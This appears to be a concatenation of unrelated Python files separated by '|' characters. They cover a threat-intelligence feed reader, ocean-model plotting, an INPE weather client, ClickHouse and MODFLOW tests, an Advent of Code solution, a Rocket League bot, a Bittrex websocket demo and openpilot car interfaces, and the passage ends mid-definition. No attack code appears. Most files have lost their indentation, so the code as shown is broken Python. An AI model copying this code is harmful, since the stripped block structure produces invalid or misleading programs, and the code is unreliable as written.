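    for portion in client.create_update_generator(collection_name='malware/cnc',
                                                  date_from='2021-01-01', limit=100):
        for feed in portion:
            # each feed carries the seqUpdate value to resume from in the next session
            last_seq_update = feed.get('seqUpdate')
    return last_seq_update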
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import scipy.io.netcdf as netcdf
plt.ion()
flag_mov = 0
flag_traj = 0
dir0 = '../run/'
file1 = 'diags.0000000000.t001.nc'
file2 = 'grid.t001.nc'
f1 = netcdf.netcdf_file(dir0 + file1)
f2 = netcdf.netcdf_file(dir0 + file2)
x = f2.variables['X'][:].copy()
y = f2.variables['Y'][:].copy()
xp1 = f2.variables['Xp1'][:].copy()
yp1 = f2.variables['Yp1'][:].copy()
T = f1.variables['T'][:].copy()
si_x = len(x)
si_y = len(y)
si_t = len(T)
h_mit = f2.variables['Depth'][:,:].copy()
vort = f1.variables['momVort3'][0,:,:].copy()
vmin = np.min(vort)
vmax = -vmin
vcont = np.linspace(vmin,vmax,20)
xunit = 1000.0 # 1:m -- 1000:km
posxy = np.zeros((2,si_t),dtype='int')
if flag_traj == 1:
for nt in range(0,si_t):
vort = f1.variables['momVort3'][nt,:,:].copy()
posxy[0,nt],posxy[1,nt] = np.unravel_index(np.argmin(vort),vort.shape)
plt.figure()
if flag_mov == -1:
nt = 0
mytime = [49]
vort = f1.variables['momVort3'][mytime[nt],:,:].copy()
plt.contour(xp1[:si_x//2]/xunit,yp1/xunit,vort[:,:si_x//2],vcont,colors='k')
plt.title('Day ' + str(mytime[nt]+1))
plt.xlabel('x (km)')
plt.ylabel('y (km)')
myci = "CI: {:.1e}".format(vcont[1]-vcont[0])
plt.text(x[120]/xunit,y[5]/xunit,myci)
if flag_traj:
plt.plot(xp1[posxy[1,:mytime[nt]]]/xunit,yp1[posxy[0,:mytime[nt]]]/xunit,'b')
plt.plot(xp1[posxy[1,mytime[nt]:]]/xunit,yp1[posxy[0,mytime[nt]:]]/xunit,'b--')
elif flag_mov == 0:
mytime = [0,9,19,29]
for nt in range(0,len(mytime)):
plt.subplot(2,2,nt+1, aspect='equal')
vort = f1.variables['momVort3'][mytime[nt],:,:].copy()
plt.contour(xp1/xunit,yp1/xunit,vort.squeeze(),vcont,colors='k')
plt.contourf(x/xunit,y/xunit,h_mit,[-10,0],colors='0.5')
plt.title('Day ' + str(mytime[nt]+1))
if nt == 2 or nt == 3:
plt.xlabel('x (km)')
if nt == 0 or nt == 2:
plt.ylabel('y (km)')
myci = "CI: {:.1e}".format(vcont[1]-vcont[0])
plt.text(x[-170]/xunit,y[5]/xunit,myci)
plt.savefig('corner_10mit.eps')
elif flag_mov == 1:
vort = f1.variables['momVort3'][:,:,:].copy()
vmin = np.min(vort)
vmax = -vmin
vcont = np.linspace(vmin,vmax,20)
for nt in range(0,si_t):
vort = f1.variables['momVort3'][nt,:,:].copy()
vort = vort.squeeze()
vort[0,0] = vmin
vort[0,1] = vmax
plt.contourf(xp1/xunit,yp1/xunit,vort,vcont,cmap = plt.cm.bwr)
plt.contourf(x/xunit,y/xunit,h_mit,[-10,0],colors='0.5')
ext = '0'
if nt > 9:
ext = ''
plt.savefig('movie/ewall_'+ ext + str(nt) + 'mit.png')
plt.clf()
f1.close()
f2.close()
|
from xml.dom import minidom
from urllib import request
import xmltodict, json
def get_informacoes_clima_7_dias(latitude, longitude):
endpoint_lat_lng = "http://servicos.cptec.inpe.br/XML/cidade/7dias/" + latitude + "/" + longitude + "/previsaoLatLon.xml"
response = request.urlopen(endpoint_lat_lng)
data = json.dumps(xmltodict.parse(response))
return json.loads(data)
def get_texto_previsao_tempo(latitude, longitude):
clima = get_informacoes_clima_7_dias(latitude, longitude)
previsao_hoje = clima['cidade']['previsao'][0]
previsao_texto = "Hoje o tempo está " + get_descricao_tempo_by_sigla(previsao_hoje['tempo'])
previsao_texto += ", a temperatura máxima é de " + previsao_hoje['maxima'] + ' graus'
previsao_texto += ", a minima é de " + previsao_hoje['minima'] + " graus celsius"
previsao_texto += ", essa é a previsão para " + clima['cidade']['nome']
previsao_texto += ", informações do INPE"
return previsao_texto
def get_descricao_tempo_by_sigla(sigla):
return siglas_tempo[sigla]
siglas_tempo = {
"ec": "Encoberto com Chuvas Isoladas",
"ci": "Chuvas Isoladas",
"c": "Chuva",
"in": "Instável",
"pp": "Poss. de Pancadas de Chuva",
"cm": "Chuva pela Manhã",
"cn": "Chuva a Noite",
"pt": "Pancadas de Chuva a Tarde",
"pm": "Pancadas de Chuva pela Manhã",
"np": "Nublado e Pancadas de Chuva",
"pc": "Pancadas de Chuva",
"pn": "Parcialmente Nublado",
"cv": "Chuvisco",
"ch": "Chuvoso",
"t": "Tempestade",
"ps": "Predomínio de Sol",
"e": "Encoberto",
"n": "Nublado",
"cl": "Céu Claro",
"nv": "Nevoeiro",
"g": "Geada",
"ne": "Neve",
"nd": "Não Definido",
"pnt": "Pancadas de Chuva a Noite",
"psc": "Possibilidade de Chuva",
"pcm": "Possibilidade de Chuva pela Manhã",
"pct": "Possibilidade de Chuva a Tarde",
"pcn": "Possibilidade de Chuva a Noite",
"npt": "Nublado com Pancadas a Tarde",
"npn": "Nublado com Pancadas a Noite",
"ncn": "Nublado com Poss. de Chuva a Noite",
"nct": "Nublado com Poss. de Chuva a Tarde",
"ncm": "Nubl. c/ Poss. de Chuva pela Manhã",
"npm": "Nublado com Pancadas pela Manhã",
"npp": "Nublado com Possibilidade de Chuva",
"vn": "Variação de Nebulosidade",
"ct": "Chuva a Tarde",
"ppn": "Poss. de Panc. de Chuva a Noite",
"ppt": "Poss. de Panc. de Chuva a Tarde",
"ppm": "Poss. de Panc. de Chuva pela Manhã"
}
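# A minimal usage sketch (the coordinates below are illustrative, roughly São Paulo);
# note that the call performs a live request to the CPTEC/INPE service:
#
#     print(get_texto_previsao_tempo("-23.55", "-46.63"))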
|
import logging
import time
import pytest
from helpers.cluster import ClickHouseCluster
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node1", main_configs=["configs/config.d/s3.xml"], macros={'replica': '1'},
with_minio=True,
with_zookeeper=True)
cluster.add_instance("node2", main_configs=["configs/config.d/s3.xml"], macros={'replica': '2'},
with_minio=True,
with_zookeeper=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
def get_large_objects_count(cluster, size=100):
minio = cluster.minio_client
counter = 0
for obj in minio.list_objects(cluster.minio_bucket, 'data/'):
if obj.size >= size:
counter = counter + 1
return counter
def wait_for_large_objects_count(cluster, expected, size=100, timeout=30):
while timeout > 0:
if get_large_objects_count(cluster, size) == expected:
return
timeout -= 1
time.sleep(1)
assert get_large_objects_count(cluster, size) == expected
@pytest.mark.parametrize(
"policy", ["s3"]
)
def test_s3_zero_copy_replication(cluster, policy):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE s3_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/s3_test', '{}')
ORDER BY id
SETTINGS storage_policy='{}'
"""
.format('{replica}', policy)
)
node1.query("INSERT INTO s3_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
# Based on version 20.x - should be only one file with size 100+ (checksums.txt), used by both nodes
assert get_large_objects_count(cluster) == 1
node2.query("INSERT INTO s3_test VALUES (2,'data'),(3,'data')")
time.sleep(1)
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
# Based on version 20.x - two parts
wait_for_large_objects_count(cluster, 2)
node1.query("OPTIMIZE TABLE s3_test")
# Based on version 20.x - after merge, two old parts and one merged
wait_for_large_objects_count(cluster, 3)
# Based on version 20.x - after cleanup - only one merged part
wait_for_large_objects_count(cluster, 1, timeout=60)
node1.query("DROP TABLE IF EXISTS s3_test NO DELAY")
node2.query("DROP TABLE IF EXISTS s3_test NO DELAY")
def test_s3_zero_copy_on_hybrid_storage(cluster):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE hybrid_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/hybrid_test', '{}')
ORDER BY id
SETTINGS storage_policy='hybrid'
"""
.format('{replica}')
)
node1.query("INSERT INTO hybrid_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
node1.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
# Total objects in S3
s3_objects = get_large_objects_count(cluster, 0)
node2.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
# Check that after moving the partition on node2 there are no new objects in S3
wait_for_large_objects_count(cluster, s3_objects, size=0)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
node1.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
node2.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
|
#!/usr/bin/python
# SPDX-License-Identifier: MIT
import math
with open("input", "r") as file:
horizontal_positions = list(map(int, file.readline().split(",")))
cheapest = math.inf
for align in range(min(horizontal_positions), max(horizontal_positions) + 1):
fuel = sum(abs(p - align) for p in horizontal_positions)
if fuel < cheapest:
cheapest = fuel
# Alternative:
# align = int(statistics.median(horizontal_positions))
# cheapest = sum(abs(p - align) for p in horizontal_positions)
print(f"cheapest total fuel: {cheapest}")
|
from Util import *
def controls(s):
s.throttle = curve1((s.y - .63 * s.brakes * s.pyv / ((1 - s.pyv / 2300) * 3 + 1)) / 999)
s.steer = curve1(Range180(s.a - s.av / 55, 1))
s.pitch = regress(-s.i - s.iv / 17)
s.yaw = regress(Range180(s.a - s.av / 12, 1))
s.roll = regress(Range180(- s.r + s.rv / 22, 1)) * (abs(s.a) < .15)
s.boost = s.throttle > .5 and abs(s.a) < .12 and (
s.poG or abs(s.i) < .2) and abs(s.y) > 99 and s.pyv < 2260
s.powerslide = s.jump = 0
# general powerslide
if s.throttle * s.pyv >= 0 and s.av * s.steer >= 0 and s.pxv * s.steer >= 0 and (
# sliding
(ang_dif(s.a, s.pva, 1) < .15 and .05 < abs(s.a) < .95) or (
# turning
s.pL[2] < 99 and .24 < abs(s.a) < .76 and s.a * ang_dif(s.a, s.av / 7, 1)) or (
# landing
s.gtime < .05 and ang_dif(s.a, s.pva, 1) < .25 and not s.kickoff)):
s.powerslide = 1
# turn 180°
if s.d2 > 400 and abs(s.a + s.av / 2.25) > 0.45:
if abs(s.a) > 0.98:
s.steer = 1
if s.d2 > 600 and s.pyv < -90:
if (abs(s.a) < 0.98 and abs(s.av) > 0.5 and
ang_dif(s.a, s.pva, 1) < .25):
s.powerslide = 1
s.steer = -sign(s.steer)
elif s.d2 > 800 and abs(s.a) < 0.95 and s.pyv < 1000:
s.throttle = 1
# three point turn
if (s.poG and 20 < abs(s.x) < 400 and abs(s.y) < 200 and .35 < abs(s.a) < .65
and abs(s.pyv) < 550 and abs(s.yv) < 550):
s.throttle = -sign(s.throttle)
s.steer = -sign(s.steer)
# general jump
if (s.z > 140 and s.tojump and (
# flying jump
(s.z < (200 * s.jcount + s.pB / 2) * s.dT * 2 and s.d2pv < 99)
or # directly below the ball
(s.z < s.jcount * 250 + s.pB * 10 and s.d2pv < 100 and s.vd2 < 150))):
s.jumper = 1
# jumping off walls
if ((s.z > 1350 or ((s.d < s.z * 1.5 or s.vd < 400) and s.pL[2] < 500
and abs(s.a) < .15 and s.bL[2] < 500)) and s.poG and
s.pL[2] > 60 and (abs(0.5 - abs(s.a)) > 0.25 or s.d > 2500)) or (
s.poG and s.pL[2] > 1900 and s.d2pv < 120):
s.jump = 1
# flip
if (s.flip and s.d > 400 and ang_dif(s.a, s.pva, 1) < .06 and s.pB < 80 and
s.pvd < 2200 and s.jcount > 0 and (s.gtime > 0.05 or not s.poG) and
not s.jumper and abs(s.i) < .2 and ((s.pyv > 1640 and s.ty - s.yv / 4 > 3500)
or (abs(s.a) > 0.75 and abs(s.ty - s.yv / 6) > 850 and s.pyv < -140)
or (s.pyv > 1120 and s.ty - s.yv / 4 > 3000 and s.pB < 16)
or (2000 > s.pyv > 970 and s.ty - s.pyv / 4 > 1650 and s.pB < 6))):
s.dodge = 1
s.djL = 's.tL'
# jump for wavedash
if (s.d > 550 and 950 < (s.ty - s.yv / 2) and ang_dif(s.a, s.pva, 1) < .02
and abs(s.i) < 0.1 and s.pL[2] < 50 and s.poG and s.pB < 40 and
1050 < s.pvd < 2200 and s.gtime > .1 and s.wavedash):
s.jump = 1
# forward wavedash
if (s.jcount > 0 and s.pL[2] + s.pV[2] / 20 < 32 and abs(s.r) < 0.1 and
abs(s.a) < 0.04 and s.y > 400 and 0 < abs(s.pR[0] / U) < 0.12 and
not s.poG and s.pV[2] < -210 and s.wavedash):
s.jump = 1
s.pitch = -1
s.yaw = s.roll = 0
if s.shoot:
dodge_hit(s)
# handling long jumps
if s.jumper and s.jcount > 0:
s.jump = 1
if not s.poG and (s.ljump != s.lljump or not s.ljump):
s.pitch = s.yaw = s.roll = 0
if 0.19 < s.airtime and s.z + s.zv / 12 > 120:
s.jump = not s.ljump
# handling pre-dodge
if s.dodge and s.jcount > 0:
s.jump = s.poG or s.z > 0
if 0.08 < s.airtime and s.pL[2] > 45:
exec("s.dja = dodge_ang(s, " + s.djL + ")")
s.jump = not s.ljump
s.pitch = abs(s.dja) * 2 - 1
s.yaw = (abs(Range180(s.dja + .5, 1) * 2) - 1) * .9
s.roll = 0
s.djT = s.time
# handling post-dodge
if 0.05 < s.djtime < 0.25:
s.pitch = s.roll = s.yaw = 0
if 0.25 < s.djtime < 0.65:
if abs(s.a) < 0.5:
if abs(s.a) < 0.8:
s.pitch = -sign(s.iv)
else:
s.pitch = s.yaw = s.roll = 0
if not s.index:
pass
def dodge_hit(s):
d2pv = d2(s.tL - s.pL - s.pV * (s.dT + .1))
# dodge hit
if (d2pv < 99 and abs(s.tL[2] - s.pL[2]) < 110 and s.bd < 1299):
# dodge to shoot
if (s.offense and (abs(s.glinex) < 650 or Range180(s.gta - s.gpa, 1) < .01)
# dodge to clear
or ((not s.offense or abs(s.a) > .8) and abs(s.oglinex) > 1400)
# dodge for kickoff
or s.kickoff):
s.dodge = 1
s.djL = 's.bL + s.bV/60'
def dodge_ang(s, tL):
L = tL - s.pL
yaw = Range180(s.pR[1] - U / 2, U) * pi / U
x, y = rotate2D(L[0], L[1], -yaw)
a = math.atan2(y, x)
return Range180(a / pi - .5, 1)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/summary_state.py
# Stanislav Lazarov
from time import sleep
from bittrex_websocket.websocket_client import BittrexSocket
if __name__ == "__main__":
class MyBittrexSocket(BittrexSocket):
def on_open(self):
self.client_callbacks = ['updateSummaryState']
def on_debug(self, **kwargs):
pass
def on_message(self, *args, **kwargs):
print(args)
tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
ws = MyBittrexSocket(tickers)
ws.run()
for i in list(range(10)):
sleep(1)
ws.stop()
|
import os
import pytest
import sys
import numpy as np
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework, running_on_CI
from simulation import Simulation
ex = [
"maw_iss305a",
"maw_iss305b",
"maw_iss305c",
"maw_iss305d",
"maw_iss305e",
"maw_iss305f",
]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf2005"
paktest = "maw"
require_failure = [True for i in range(len(exdirs))]
require_failure[0] = False
# set continuous_integration to True when version 1.13.0 is released
continuous_integration = [True for n in ex]
# set replace_exe to None to use default executable
replace_exe = None
# temporal discretization
nper = 2
perlen = [0.0, 365.0]
nstp = [1, 25]
tsmult = [1.0, 1.1]
steady = [True, False]
# spatial discretization
nlay, nrow, ncol = 2, 101, 101
shape3d = (nlay, nrow, ncol)
size3d = nlay * nrow * ncol
xlen = 1000.0
common_ratio = 1.01
nhalf = int(0.5 * ncol) + 1
first_term = 0.5 * xlen / ((1 - common_ratio**nhalf) / (1 - common_ratio))
delr = np.zeros((ncol), dtype=float)
for n in range(nhalf):
if n == 0:
v = first_term
else:
v = first_term * common_ratio**n
delr[nhalf + n - 1] = v
delr[: nhalf - 1] = delr[-1 : nhalf - 1 : -1]
# add error to edge cells
err = xlen - delr.sum()
delr[0] += 0.5 * err
delr[-1] += 0.5 * err
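# Note on the spacing above: each half-row of cell widths is a geometric series,
#   first_term * (1 + r + r**2 + ... + r**(nhalf - 1)) = first_term * (1 - r**nhalf) / (1 - r),
# so first_term = 0.5 * xlen / ((1 - r**nhalf) / (1 - r)) makes each half sum to 0.5 * xlen
# (with r = common_ratio); the small residual err is then split between the two edge cells.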
top = 0.0
botm = [-175, -350.0]
strt = 0.0
# hydraulic data
hk = 1.0
ss = 1e-5
confined = 0
chd_spd = []
chd5_spd = []
for i in range(nrow):
if i == 0 or i == ncol - 1:
for j in range(ncol):
chd_spd.append([(0, i, j), strt])
chd5_spd.append([0, i, j, strt, strt])
else:
chd_spd.append([(0, i, 0), strt])
chd_spd.append([(0, i, ncol - 1), strt])
chd5_spd.append([0, i, 0, strt, strt])
chd5_spd.append([0, i, ncol - 1, strt, strt])
# maw data
radius0 = np.sqrt(delr[nhalf] * delr[nhalf] / (8.0 * np.pi))
radius = 0.25
sradius0 = radius + 0.1
wellq = -100.0
skin_mult = [0.1, 10.0, 1.0, 0.0, -1.0, 100.0]
condeqn = ["CUMULATIVE", "SKIN", "SKIN", "SKIN", "SPECIFIED", "CUMULATIVE"]
sradius = [sradius0, sradius0, sradius0, sradius0, sradius0, radius0 * 1.5]
tdis_rc = []
for idx in range(nper):
tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))
hclose, rclose = 1e-9, 1e-6
def build_model(idx, dir):
name = ex[idx]
ws = dir
# build MODFLOW 6 files
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create iterative model solution
ims = flopy.mf6.ModflowIms(
sim, inner_dvclose=hclose, rcloserecord=rclose, outer_dvclose=hclose
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(sim, modelname=name, save_flows=True)
# discretization
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=False, icelltype=confined, k=hk
)
# storage
sto = flopy.mf6.ModflowGwfsto(
gwf,
save_flows=False,
iconvert=confined,
ss=ss,
steady_state={0: True},
transient={1: True},
)
# constant head
chd = flopy.mf6.ModflowGwfchd(
gwf, stress_period_data=chd_spd, save_flows=False
)
# multi-aquifer well
hks = hk * skin_mult[idx]
mpd = [[0, radius, botm[-1], strt, condeqn[idx], 2]]
mcd = [
[0, 0, (0, nhalf, nhalf), top, botm[0], hks, sradius[idx]],
[0, 1, (1, nhalf, nhalf), botm[0], botm[1], hks, sradius[idx]],
]
perioddata = {1: [[0, "RATE", wellq]]}
maw = flopy.mf6.ModflowGwfmaw(
gwf,
print_input=True,
no_well_storage=True,
packagedata=mpd,
connectiondata=mcd,
perioddata=perioddata,
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
)
# build MODFLOW-2005 files
if require_failure[idx]:
mc = None
else:
ws = os.path.join(dir, cmppth)
mc = flopy.modflow.Modflow(name, model_ws=ws, version=cmppth)
dis = flopy.modflow.ModflowDis(
mc,
nlay=nlay,
nrow=nrow,
ncol=ncol,
nper=nper,
perlen=perlen,
nstp=nstp,
tsmult=tsmult,
steady=steady,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
bas = flopy.modflow.ModflowBas(mc, strt=strt)
lpf = flopy.modflow.ModflowLpf(
mc, laytyp=confined, hk=hk, vka=hk, ss=ss, sy=0
)
chd = flopy.modflow.ModflowChd(mc, stress_period_data=chd5_spd)
# mnw2
# empty mnw2 file to create recarrays
mnw2 = flopy.modflow.ModflowMnw2(mc)
node_data = mnw2.get_empty_node_data(2)
node_data["ztop"] = np.array([top, botm[0]])
node_data["zbotm"] = np.array([botm[0], botm[1]])
node_data["i"] = np.array([nhalf, nhalf])
node_data["j"] = np.array([nhalf, nhalf])
node_data["wellid"] = np.array(["well1", "well1"])
node_data["losstype"] = np.array(["skin", "skin"])
node_data["rw"] = np.array([radius, radius])
node_data["rskin"] = np.array([sradius[idx], sradius[idx]])
node_data["kskin"] = np.array([hks, hks])
dtype = [("wellid", np.unicode_, 20), ("qdes", "<f8")]
spd0 = np.zeros(1, dtype=dtype)
spd0["wellid"] = "well1"
spd1 = np.zeros(1, dtype=dtype)
spd1["wellid"] = "well1"
spd1["qdes"] = wellq
spd = {0: spd0, 1: spd1}
mnw2 = flopy.modflow.ModflowMnw2(
mc,
mnwmax=1,
node_data=node_data,
stress_period_data=spd,
itmp=[1, 1],
mnwprnt=2,
)
oc = flopy.modflow.ModflowOc(
mc,
stress_period_data=None,
save_every=1,
save_types=["save head", "save budget"],
)
pcg = flopy.modflow.ModflowPcg(mc, hclose=hclose, rclose=rclose)
return sim, mc
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# determine if running on CI infrastructure
is_CI = running_on_CI()
# initialize testing framework
test = testing_framework()
# build the models
test.build_mf6_models_legacy(build_model, idx, dir)
# run the test model
if is_CI and not continuous_integration[idx]:
return
test.run_mf6(Simulation(dir, require_failure=require_failure[idx]))
def main():
# initialize testing framework
test = testing_framework()
# build the models
# run the test model
for idx, dir in enumerate(exdirs):
test.build_mf6_models_legacy(build_model, idx, dir)
sim = Simulation(dir, require_failure=require_failure[idx])
test.run_mf6(sim)
return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
|
import os
import time
from cereal import car
from common.kalman.simple_kalman import KF1D
from common.realtime import DT_CTRL
from selfdrive.car import gen_empty_fingerprint
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.events import Events
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX
GearShifter = car.CarState.GearShifter
EventName = car.CarEvent.EventName
MAX_CTRL_SPEED = (V_CRUISE_MAX + 4) * CV.KPH_TO_MS  # (144 + 4) km/h ~= 92 mph
# generic car and radar interfaces
class CarInterfaceBase():
def __init__(self, CP, CarController, CarState):
self.CP = CP
self.VM = VehicleModel(CP)
self.frame = 0
self.low_speed_alert = False
if CarState is not None:
self.CS = CarState(CP)
self.cp = self.CS.get_can_parser(CP)
self.cp_cam = self.CS.get_cam_can_parser(CP)
self.cp_body = self.CS.get_body_can_parser(CP)
self.CC = None
if CarController is not None:
self.CC = CarController(self.cp.dbc_name, CP, self.VM)
@staticmethod
def calc_accel_override(a_ego, a_target, v_ego, v_target):
return 1.
@staticmethod
def compute_gb(accel, speed):
raise NotImplementedError
@staticmethod
def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=None):
raise NotImplementedError
# returns a set of default params to avoid repetition in car specific params
@staticmethod
def get_std_params(candidate, fingerprint):
ret = car.CarParams.new_message()
ret.carFingerprint = candidate
ret.isPandaBlack = True # TODO: deprecate this field
# standard ALC params
ret.steerControlType = car.CarParams.SteerControlType.torque
ret.steerMaxBP = [0.]
ret.steerMaxV = [1.]
ret.minSteerSpeed = 0.
# stock ACC by default
ret.enableCruise = True
ret.minEnableSpeed = -1. # enable is done by stock ACC, so ignore this
ret.steerRatioRear = 0. # no rear steering, at least on the listed cars above
ret.gasMaxBP = [0.]
ret.gasMaxV = [.5] # half max gas
ret.brakeMaxBP = [0.]
ret.brakeMaxV = [1.]
ret.openpilotLongitudinalControl = False
ret.startAccel = 0.0
ret.stoppingControl = False
ret.longitudinalTuning.deadzoneBP = [0.]
ret.longitudinalTuning.deadzoneV = [0.]
ret.longitudinalTuning.kpBP = [0.]
ret.longitudinalTuning.kpV = [1.]
ret.longitudinalTuning.kiBP = [0.]
ret.longitudinalTuning.kiV = [1.]
return ret
# returns a car.CarState, pass in car.CarControl
def update(self, c, can_strings):
raise NotImplementedError
# return sendcan, pass in a car.CarControl
def apply(self, c):
raise NotImplementedError
def create_common_events(self, cs_out, extra_gears=[], gas_resume_speed=-1, pcm_enable=True): # pylint: disable=dangerous-default-value
events = Events()
if cs_out.doorOpen:
events.add(EventName.doorOpen)
if cs_out.seatbeltUnlatched:
events.add(EventName.seatbeltNotLatched)
if cs_out.gearShifter != GearShifter.drive and cs_out.gearShifter not in extra_gears:
events.add(EventName.wrongGear)
if cs_out.gearShifter == GearShifter.reverse:
events.add(EventName.reverseGear)
if not cs_out.cruiseState.available:
events.add(EventName.wrongCarMode)
if cs_out.espDisabled:
events.add(EventName.espDisabled)
if cs_out.gasPressed:
events.add(EventName.gasPressed)
if cs_out.stockFcw:
events.add(EventName.stockFcw)
if cs_out.stockAeb:
events.add(EventName.stockAeb)
if cs_out.vEgo > MAX_CTRL_SPEED:
events.add(EventName.speedTooHigh)
if cs_out.cruiseState.nonAdaptive:
events.add(EventName.wrongCruiseMode)
if cs_out.steerError:
events.add(EventName.steerUnavailable)
elif cs_out.steerWarning:
events.add(EventName.steerTempUnavailable)
# Disable on rising edge of gas or brake. Also disable on brake when speed > 0.
# Optionally allow to press gas at zero speed to resume.
# e.g. Chrysler does not spam the resume button yet, so resuming with gas is handy. FIXME!
if (cs_out.gasPressed and (not self.CS.out.gasPressed) and cs_out.vEgo > gas_resume_speed) or \
(cs_out.brakePressed and (not self.CS.out.brakePressed or not cs_out.standstill)):
events.add(EventName.pedalPressed)
# we engage when pcm is active (rising edge)
if pcm_enable:
if cs_out.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
events.add(EventName.pcmEnable)
elif not cs_out.cruiseState.enabled:
events.add(EventName.pcmDisable)
return events
class RadarInterfaceBase():
def __init__(self, CP):
self.pts = {}
self.delay = 0
self.radar_ts = CP.radarTimeStep
self.no_radar_sleep = 'NO_RADAR_SLEEP' in os.environ
def update(self, can_strings):
ret = car.RadarData.new_message()
if not self.no_radar_sleep:
time.sleep(self.radar_ts) # radard runs on RI updates
return ret
class CarStateBase:
def __init__(self, CP):
self.CP = CP
self.car_fingerprint = CP.carFingerprint
self.out = car.CarState.new_message()
self.cruise_buttons = 0
self.left_blinker_cnt = 0
self.right_blinker_cnt = 0
# Q = np.matrix([[10.0, 0.0], [0.0, 100.0]])
# R = 1e3
self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
A=[[1.0, DT_CTRL], [0.0, 1.0]],
C=[1.0, 0.0],
K=[[0.12287673], [0.29666309]])
def update_speed_kf(self, v_ego_raw):
if abs(v_ego_raw - self.v_ego_kf.x[0][0]) > 2.0: # Prevent large accelerations when car starts at non zero speed
self.v_ego_kf.x = [[v_ego_raw], [0.0]]
v_ego_x = self.v_ego_kf.update(v_ego_raw)
return float(v_ego_x[0]), float(v_ego_x[1])
def update_blinker(self, blinker_time: int, left_blinker_lamp: bool, right_blinker_lamp: bool):
self.left_blinker_cnt = blinker_time if left_blinker_lamp else max(self.left_blinker_cnt - 1, 0)
self.right_blinker_cnt = blinker_time if right_blinker_lamp else max(self.right_blinker_cnt - 1, 0)
return self.left_blinker_cnt > 0, self.right_blinker_cnt > 0
@staticmethod
def parse_gear_shifter(gear):
return {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
'E': GearShifter.eco, 'T': GearShifter.manumatic, 'D': GearShifter.drive,
'S': GearShifter.sport, 'L': GearShifter.low, 'B': GearShifter.brake}.get(gear, GearShifter.unknown)
@staticmethod
def get_cam_can_parser(CP):
return None
@staticmethod
